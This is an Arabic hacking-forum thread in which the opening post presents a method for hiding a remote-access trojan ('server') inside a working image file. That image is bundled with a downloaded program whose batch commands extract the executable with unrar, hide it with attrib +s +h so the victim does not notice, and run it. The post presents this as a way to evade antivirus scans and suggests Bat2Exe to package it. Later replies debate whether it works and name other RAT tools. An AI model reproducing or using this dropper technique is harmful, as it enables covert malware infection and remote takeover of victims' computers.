فكرة تحت التطوير لتلغيم المنتديات

تم تحميل الصفحة في 1,5131229 ثانية
فكرة تحت التطوير لتلغيم المنتديات
الحالة
مغلق و غير مفتوح للمزيد من الردود.

Reko24

Active DeveloPer
rankrankrank
إنضم
24 سبتمبر 2008
المشاركات
679
الإعجابات
169
النقاط
43




السلام عليكم ورحمة الله وبركاته


لقد تم شرح بالمنتدى اكثر من مرة طريقة اخفاء السيرفر داخل الصورة
ولكن لا احد حاول يستفيد من هذه الطريقة بشكل صحيح
والى ما يعرف عن شو بتكلم يراجع الموضوع

http://www.dev-point.com/vb/t99518.html

ميزة هذه الطريقة هي ان الصورة تعمل بشكل طبيعي ولا يمكن تفرقتها عن اي صورة اخرى
فهي تفتح من خلال مستعرض الصور او المتصفح او اي برنامج كاي صورة عادية
ولكن يكون بدخلها ملف السيرفر


المشكلة هي كيف سيعمل السيرفر :33:

في كثير من الاحيان نحمل برنامج او ملف من النت نجد معه صورة للبرنامج او صورة توقيع لصاحب الموضوع
وهذا ما سنستغله في فكرتنا


ولكن حنضع الصورة الملغومة ( الى بداخلها السيرفر )

حتقلي وكيف حيشتغل السيرفر :31:

زي ما قلت سابقا انو الصورة تكون مرفقة لبرنامج معين فممكن ندمج البرنامج ببعض اوامر الدوس
التى ستشغل السيرفر
وبالتالي عند فحص البرنامج يكون نظيف ولا يوجد اي اتصال خارجي
لان سيرفرنا موجود بالصورة وليس بالبرنامج
وطبيعي انه مش حيفحص الصورة لانها تظهر له كاي صورة عادية

اظن الان وضحت لكم الفكرة ....

الان ناتي لاوامر الدوس التى سيتم من خلالها تشغيل السيرفر
كود:
@echo off
"c:\program files\winrar\unrar" x -p- "B.jpg"
attrib "A.exe" +s +h
Start A.exe
نشرح الاوامر
السطر الثاني هو لستخراج السيرفر من الصورة في نفس المجلد الى فيه الصورة
السطر الثالث هو لتغير خصائص السيرفر وجعله مخفي حتى لا يظهر لضحية ولا يشك
السطر الرابع و الاخير هو امر تغيل السيرفر بعد استخراجه


B.jpg : هو اسم الصورة الملغومة
A.exe : هو اسم السيرفر الى بداخل الصورة


طبعا هذه الاوامر يتم كتابتها بمستند نصي وحفظه بامتداد bat
ولتسهيل دمجه بالبرنامج يمكن تحويله الى ملف exe من خلال الاداة Bat2ExE
يمكن تحميلها من الرابط التالي :

http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html

المشاكل التى حتواجهك

اولا : شاشة الدوس التى تظهر عند تنفيذ الاوامر
ثانيا : عند نقل البرنامج الى مجلد احر وتشغيله ستظهر رسالة خطأ عند تنفيذ اوامر الدوس
بسبب عدم وجود الصورة بالمجلد


بنهاية اشكراكم للمتابعة
واترك لكم الفكرة لتطويرها و استغلالها
 
إنضم
10 نوفمبر 2006
المشاركات
1,817
الإعجابات
645
النقاط
0
الإقامة
أ‡أ،أ“أڑأœأœأ¦أڈأ­أ‰ - أ‡أ،أ‍أ•أ­أ£ - أˆأ‘أ­أڈأ¥
رد: فكرة تحت التطوير لتلغيم المنتديات

اخي على حسب فهمي طريقه غبيه جدا

كيف افتح الدوس عند الضحيه ؟؟؟؟؟؟؟؟

اخي انا لا اريد ان اشوه موضوعك لكن الاخترااق بصوره من سابع المستحيلات

اخي كلنا نعرف ان exe امتداد تنفيذي كيف تجعل صيغه الصوره تنفيذيه ؟؟

يعني كيف الصوره تنزل بالرجستري وتنسخخ نفسهااا بــ قرص C

اخي لو فيه امل ان الفكره تتحقق كاان سبقونا الغرب اللي هم من برمجو البيفورست والبيزون

يعني كل مبرمجي برامج الاختراق الاجاانب ماايحبون يخترقون بصوره ؟؟ اكيد تحبون لكن هي مستحيل

اتمنى من من الاخوااان التفكير بمنطق وعقل


اسف على ردي اتوقع مايعجبك لكن هذا رايي اتمنا انك تتقبله :28:
 
إنضم
26 ديسمبر 2009
المشاركات
758
الإعجابات
36
النقاط
0
رد: فكرة تحت التطوير لتلغيم المنتديات

السلام عليكم

الفكرة نفذة و طورة و السلام وهذا رابط موضوعي http://www.dev-point.com/vb/t165650.html

ان احتجت للاكواد و اخفاء الدوس تجدهم في موضوعي التقييم ان امكن :33:



http://www.dev-point.com/vb/t165650.html
 

Reko24

Active DeveloPer
rankrankrank
إنضم
24 سبتمبر 2008
المشاركات
679
الإعجابات
169
النقاط
43
رد: فكرة تحت التطوير لتلغيم المنتديات

اخي على حسب فهمي طريقه غبيه جدا

كيف افتح الدوس عند الضحيه ؟؟؟؟؟؟؟؟

اخي انا لا اريد ان اشوه موضوعك لكن الاخترااق بصوره من سابع المستحيلات

اخي كلنا نعرف ان exe امتداد تنفيذي كيف تجعل صيغه الصوره تنفيذيه ؟؟

يعني كيف الصوره تنزل بالرجستري وتنسخخ نفسهااا بــ قرص C

اخي لو فيه امل ان الفكره تتحقق كاان سبقونا الغرب اللي هم من برمجو البيفورست والبيزون

يعني كل مبرمجي برامج الاختراق الاجاانب ماايحبون يخترقون بصوره ؟؟ اكيد تحبون لكن هي مستحيل

اتمنى من من الاخوااان التفكير بمنطق وعقل


اسف على ردي اتوقع مايعجبك لكن هذا رايي اتمنا انك تتقبله :28:

اولا اشكرك على المرور
ولكن مين قال انو هذا شرح للاختراق بصيغة صورة
هذا فقط اخفاء لسيرفر داخل السيرفر
ومن خلال البرنامج المرفق الى بصيغة exe يتم تنفيذ اوامر الدوس لاستخراج السيرفر وتشغيله
بس شكلك ما قرات الموضوع جيدا
اقراء الموضوع مرة اخرى وركز فيه وانت حتفهم الفكرة
 

Reko24

Active DeveloPer
rankrankrank
إنضم
24 سبتمبر 2008
المشاركات
679
الإعجابات
169
النقاط
43
رد: فكرة تحت التطوير لتلغيم المنتديات

السلام عليكم

الفكرة نفذة و طورة و السلام وهذا رابط موضوعي http://www.dev-point.com/vb/t165650.html

ان احتجت للاكواد و اخفاء الدوس تجدهم في موضوعي التقييم ان امكن :33:



http://www.dev-point.com/vb/t165650.html

انا شفت موضوعك ولم ارى غير فيديو يعرض انك شغلت ملف exe
ووصل التبليغ لم ارى اي اومر دوس وحتى لم تشرح شو الى عملته بالضبط
وانت تقول ان هذا اختراق بصيغة صورة وهذا ليس اختراق بصيغة صورة
 
إنضم
26 ديسمبر 2009
المشاركات
758
الإعجابات
36
النقاط
0
رد: فكرة تحت التطوير لتلغيم المنتديات


انا شفت موضوعك ولم ارى غير فيديو يعرض انك شغلت ملف exe
ووصل التبليغ لم ارى اي اومر دوس وحتى لم تشرح شو الى عملته بالضبط
وانت تقول ان هذا اختراق بصيغة صورة وهذا ليس اختراق بصيغة صورة

انا شرحت في الردود طريقة العمل والتلغيم يعني لو رديت مش راح ابخل عليك

احسن ماتفتح موضوع يعني وكلمت شكر ما راح تموتك مدام دخلت واستفدت
 
إنضم
18 أغسطس 2010
المشاركات
2,068
الإعجابات
198
النقاط
0
رد: فكرة تحت التطوير لتلغيم المنتديات

ماقصرت ياغالي شرح كافي ووافي .. كفى تحطيما للعضو

العضو اجتهد وحاول انو يبدع .. لماذا تدخلون الغرب في كل شيئ ونحن اصبحنا لا نفقه بشيئ .

المشكلة التي تواجهنا هي الاحتكار وحب النفس ... قول لو فعلنا مثلهم يدا بيد ماكان احد صف بجمبنا

صدق المثل القائل :

إتفق العرب على الا يتفقو

بالتوفيق ياصاحب الموضوع واشكرك على ابداعك

تم تقيمك
 

Reko24

Active DeveloPer
rankrankrank
إنضم
24 سبتمبر 2008
المشاركات
679
الإعجابات
169
النقاط
43
رد: فكرة تحت التطوير لتلغيم المنتديات


انا شرحت في الردود طريقة العمل والتلغيم يعني لو رديت مش راح ابخل عليك

احسن ماتفتح موضوع يعني وكلمت شكر ما راح تموتك مدام دخلت واستفدت
يا اخي لو استفدت بشي بسيط لرديت وقيمتك كمان
بس انت عنوان الموضوع تقول اختراق بصورة ودخل الموضوع واضع فيديو مش مفهوم شو الى بتقصده منه
شو انت بدك الاعضاء يسألوك وانت تجوب ولا شوو
الي يضع موضوع يضعه كمل حتى يستفيد من الاعضاء

وعلى العموم ياريت ما تتحول المواضيع لاتهمات وساحة دردشة اذا شايف انو موضوعي مكرر او مخالف
بامكانك تبلغ الادارة لحذفه

 
إنضم
26 ديسمبر 2009
المشاركات
758
الإعجابات
36
النقاط
0
رد: فكرة تحت التطوير لتلغيم المنتديات

يا اخي لو استفدت بشي بسيط لرديت وقيمتك كمان
بس انت عنوان الموضوع تقول اختراق بصورة ودخل الموضوع واضع فيديو مش مفهوم شو الى بتقصده منه
شو انت بدك الاعضاء يسألوك وانت تجوب ولا شوو
الي يضع موضوع يضعه كمل حتى يستفيد من الاعضاء

وعلى العموم ياريت ما تتحول المواضيع لاتهمات وساحة دردشة اذا شايف انو موضوعي مكرر او مخالف
بامكانك تبلغ الادارة لحذفه

طبعا الموضوع كان تكمله للموضوع نقاش كود الدودة الموقوتة
الاعضاء لي كانو متابعين (المبتدئيين) على احد تعليقاتك فهمو الطريقة
لي توصلتلها في استغلال التلغيم يعني العشارات

:13::13::13::13::13::13:
 

Reko24

Active DeveloPer
rankrankrank
إنضم
24 سبتمبر 2008
المشاركات
679
الإعجابات
169
النقاط
43
رد: فكرة تحت التطوير لتلغيم المنتديات

ماقصرت ياغالي شرح كافي ووافي .. كفى تحطيما للعضو

العضو اجتهد وحاول انو يبدع .. لماذا تدخلون الغرب في كل شيئ ونحن اصبحنا لا نفقه بشيئ .

المشكلة التي تواجهنا هي الاحتكار وحب النفس ... قول لو فعلنا مثلهم يدا بيد ماكان احد صف بجمبنا

صدق المثل القائل :

إتفق العرب على الا يتفقو

بالتوفيق ياصاحب الموضوع واشكرك على ابداعك

تم تقيمك
يشرفني مرورك يا اخي
فعلا الكثير من الاعضاء يفكر الان الجانب افضل منا في كل شيء
صحيح هما افضل منا ولكن في شيء واحد فقط وهو انهم يطورو افكارهم وينفذها
اما نحن نريد كل شيء ياتينا جاهز نبحث فقط عن سيرفر مشفر او برنامج اختراق
لماذا لا تتعلم التشفير وتشفر لنفسك ولماذا لا تتعلم البرمجة وتنتج برنامج اقوى من البرامج الموجودة
واكبر دليل برنامج [ lostdoor ] فهو من برمجة عربية بالكامل
لو المبرمج فضل يعتمد على الاخرين لما قدر يقوم ببرمجت برنامج ختراق مثل هذا
ولكنه استغل خبرته بالبرمجة وانتج هذا البرنامج القوي
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل